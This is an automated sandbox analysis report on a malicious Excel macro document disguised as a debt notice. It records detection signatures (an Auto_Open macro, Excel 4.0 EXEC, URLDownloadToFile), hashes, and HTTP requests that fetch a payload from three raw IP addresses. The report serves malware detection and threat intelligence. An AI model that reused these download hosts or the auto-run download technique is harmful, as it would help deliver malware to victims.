Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-1840996632-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1840996632-05042021.xlsm
Analysis ID:404162
MD5:0276be45120eeb640587451db55759cb
SHA1:51424cff72ecb039f78d5005a03ec2882a96d7dd
SHA256:06c9a8f5da75ebc77f7528ceb2797050ba17cc2c7e36467b0d259d4f48dbbcbf
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1268 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: excel.exeMemory has grown: Private usage: 1MB later: 83MB
Source: global trafficTCP traffic: 192.168.2.3:49718 -> 185.183.99.115:80
Source: global trafficTCP traffic: 192.168.2.3:49718 -> 185.183.99.115:80
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.115Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.73.159Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.38Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.115Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.73.159Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.38Connection: Keep-Alive
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.aadrm.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.cortana.ai
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.office.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.onedrive.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://augloop.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://augloop.office.com/v2
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cdn.entity.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://clients.config.office.net/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://config.edge.skype.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cortana.ai
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cortana.ai/api
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://cr.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dev.cortana.ai
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://devnull.onenote.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://directory.services.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://graph.windows.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://graph.windows.net/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://lifecycle.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://login.windows.local
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://management.azure.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://management.azure.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://messaging.office.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ncus.contentsync.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://officeapps.live.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://onedrive.live.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://outlook.office.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://outlook.office365.com/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://powerlift.acompli.net
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://settings.outlook.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://staging.cortana.ai
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://tasks.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://webshell.suite.office.com
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://wus2.contentsync.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-1840996632-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_OpenName: Auto_Open
Source: Outstanding-Debt-1840996632-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1BDF7DCB-2EEE-42FF-962F-63FF48E04A43} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1840996632-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
